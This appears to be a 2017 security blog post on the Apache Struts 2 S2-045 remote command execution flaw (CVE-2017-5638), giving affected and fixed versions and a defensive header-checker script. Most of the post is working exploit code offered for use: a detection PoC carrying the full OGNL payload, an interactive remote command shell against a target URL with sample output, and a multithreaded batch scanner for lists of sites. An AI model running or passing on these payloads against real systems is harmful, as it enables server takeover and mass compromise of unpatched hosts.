Published 2017-03-07 | Category: web security
Disclaimer: the tools in this article are for personal testing and research only. Delete them within 24 hours of downloading; they must not be used for commercial or illegal purposes, otherwise you bear the consequences.
Apache Struts 2 has been found to contain a remote command execution vulnerability, advisory S2-045, CVE-2017-5638. When the file upload feature based on the Jakarta plugin is in use, remote command execution is possible and can lead to the system being compromised. Severity rating: high.
Vulnerability details: a malicious user can trigger the vulnerability while uploading a file by modifying the Content-Type value in the HTTP request header, and thereby execute system commands.
Risk level: high. Risk: an attacker exploiting this vulnerability can achieve remote command execution.
Affected versions: Struts 2.3.5 - Struts 2.3.31, Struts 2.5 - Struts 2.5.10.
Fixed versions: Struts 2.3.32 or 2.5.10.1.
Remediation: if you are using the Jakarta file upload plugin, upgrade Struts to a fixed version.
More references: https://cwiki.apache.org/confluence/display/WW/S2-045
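The advisory above boils down to one observable: an OGNL expression where a multipart Content-Type should be. As an added, defender-side example (not from the original post or the PoC repository), the Python 3 checker below parses a raw request head and flags a Content-Type that carries OGNL syntax, the sandbox-bypass identifiers the public payloads depend on, or a multipart type that does not have the standard `boundary=` shape; the sample requests and the boundary pattern are constructed here for illustration.

```python
import re
from typing import Dict, List

# Identifiers that appear in public S2-045 payloads and have no business in a
# Content-Type header: OGNL expression syntax plus the sandbox-bypass and
# command-execution classes the exploit chain needs.
OGNL_EXPR = re.compile(r"[%$]\{")
SUSPICIOUS_TOKENS = (
    "#_memberAccess", "DEFAULT_MEMBER_ACCESS", "ognl.OgnlContext",
    "getExcludedClasses", "getExcludedPackageNames", "ProcessBuilder",
)
# The shape a legitimate multipart Content-Type takes (RFC 2046 boundary characters).
NORMAL_MULTIPART = re.compile(r"^multipart/form-data;\s*boundary=[\w'()+,\-./:=?]+$", re.I)


def parse_headers(raw_request: str) -> Dict[str, str]:
    """Split a raw HTTP request head into a lower-cased header dict (values stripped)."""
    lines = raw_request.strip().splitlines()[1:]  # drop the request line
    headers = {}
    for line in lines:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return headers


def inspect_content_type(value: str) -> List[str]:
    """Return the reasons a Content-Type value looks like an S2-045 attempt; [] if clean."""
    reasons = []
    if OGNL_EXPR.search(value):
        reasons.append("ognl-expression-syntax")
    reasons += ["token:" + t for t in SUSPICIOUS_TOKENS if t in value]
    if "multipart/form-data" in value.lower() and not NORMAL_MULTIPART.match(value):
        reasons.append("non-standard-multipart-content-type")
    return reasons


def scan_request(raw_request: str) -> List[str]:
    """Inspect one raw request head; an empty list means nothing suspicious."""
    return inspect_content_type(parse_headers(raw_request).get("content-type", ""))


# Constructed sample requests (not real traffic). The third imitates only the outer shape of
# the S2-045 header: an OGNL block whose first term fakes a multipart type; the body is elided.
BENIGN_UPLOAD = "POST /upload.action HTTP/1.1\r\nHost: app\r\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxk\r\n"
BENIGN_JSON = "POST /api HTTP/1.1\r\nHost: app\r\nContent-Type: application/json\r\n"
ATTACK_SHAPE = "POST /a.action HTTP/1.1\r\nHost: app\r\nContent-Type: %{(#x='multipart/form-data').(#_memberAccess=...).(#p=new java.lang.ProcessBuilder(#cmds))}\r\n"

if __name__ == "__main__":
    for name, req in (("upload", BENIGN_UPLOAD), ("json", BENIGN_JSON), ("attack", ATTACK_SHAPE)):
        print(name, scan_request(req) or "clean")
```

The same checks translate directly into a WAF or reverse-proxy rule on the Content-Type header; until the upgrade to 2.3.32 / 2.5.10.1 is done, rejecting any Content-Type that does not match the normal multipart shape blocks this class of request at the edge.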
POC
# -*- coding: utf-8 -*-
# Python 2 script; requires the "poster" package (pip install poster).
import sys
import urllib2
from poster.encode import multipart_encode
from poster.streaminghttp import register_openers


def poc(url):
    """Send a multipart upload whose Content-Type carries the OGNL payload; return the response body."""
    register_openers()
    # Any small local file serves as the dummy upload body.
    datagen, header = multipart_encode({"image1": open("tmp.txt", "rb")})
    header["User-Agent"] = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
    # The payload runs `echo nMask` on the server and copies the output into the HTTP response.
    header["Content-Type"] = "%{(#nike='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil =#container.getInstance(@[email protected])).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo nMask').(#iswin=(@[email protected]('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@[email protected]().getOutputStream())).(@ [email protected](#process.getInputStream(),#ros)).(#ros.flush())}"
    request = urllib2.Request(url, datagen, headers=header)
    response = urllib2.urlopen(request)
    body = response.read()
    return body


url = sys.argv[1]
body = poc(url)
# The marker string only comes back if the command actually ran.
if "nMask" in body:
    print "[Loopholes exist]", url
Poc_Cmd
# Python 2 script; requires the "poster" package (pip install poster).
import sys
import urllib2
from poster.encode import multipart_encode
from poster.streaminghttp import register_openers


def poc(url, content="echo nMask"):
    """Same request as the detection PoC, but the command is taken from `content`."""
    register_openers()
    datagen, header = multipart_encode({"image1": open("tmp.txt", "rb")})
    header["User-Agent"] = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
    # `content` is spliced into the #cmd term of the OGNL expression.
    header["Content-Type"] = "%{(#nike='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil =#container.getInstance(@[email protected])).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='" + content + "').(#iswin=(@[email protected]('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@[email protected]().getOutputStream())).(@ [email protected](#process.getInputStream(),#ros)).(#ros.flush())}"
    request = urllib2.Request(url, datagen, headers=header)
    response = urllib2.urlopen(request)
    body = response.read()
    return body


url = sys.argv[1]
body = poc(url)
if "nMask" in body:
    print "[Loopholes exist]", url
    # Interactive loop: each line typed is sent as the command and its output printed.
    while 1:
        con = raw_input("[cmd]>>")
        print poc(url, content=con)
Output:
>python s2_045_cmd.py http://xxx.com/?a.action
[Loopholes exist] http://xxx.com/?a.action
[cmd]>>ls
example1
example2
Multi-threaded batch detection
# Python 2 script; requires the "poster" package (pip install poster).
import threading
import urllib2
from poster.encode import multipart_encode
from poster.streaminghttp import register_openers


def poc(url):
    """Probe one URL; print the verdict and append vulnerable URLs to result.txt."""
    register_openers()
    datagen, header = multipart_encode({"image1": open("tmp.txt", "rb")})
    header["User-Agent"] = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
    header["Content-Type"] = "%{(#nike='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil =#container.getInstance(@[email protected])).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo nMask').(#iswin=(@[email protected]('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@[email protected]().getOutputStream())).(@ [email protected](#process.getInputStream(),#ros)).(#ros.flush())}"
    try:
        request = urllib2.Request(url, datagen, headers=header)
        # Short timeout so one unreachable host does not stall the batch.
        response = urllib2.urlopen(request, timeout=5)
        body = response.read()
    except Exception:
        body = ""
    if "nMask" in body:
        print "[Loopholes exist]", url
        f.write(url + "\n")
    else:
        print "Loopholes not exist", url


if __name__ == "__main__":
    '''
    url.txt is the list of URLs to check
    result.txt is the output file for the results
    '''
    f = open("result.txt", "a")
    url_list = [i.replace("\n", "") for i in open("url.txt", "r").readlines()]
    for url in url_list:
        threading.Thread(target=poc, args=(url,)).start()
        # Crude concurrency cap: wait until fewer than 50 threads are alive before starting the next.
        while 1:
            if len(threading.enumerate()) < 50:
                break
POC download: https://github.com/tengzhangchao/Struts2_045-Poc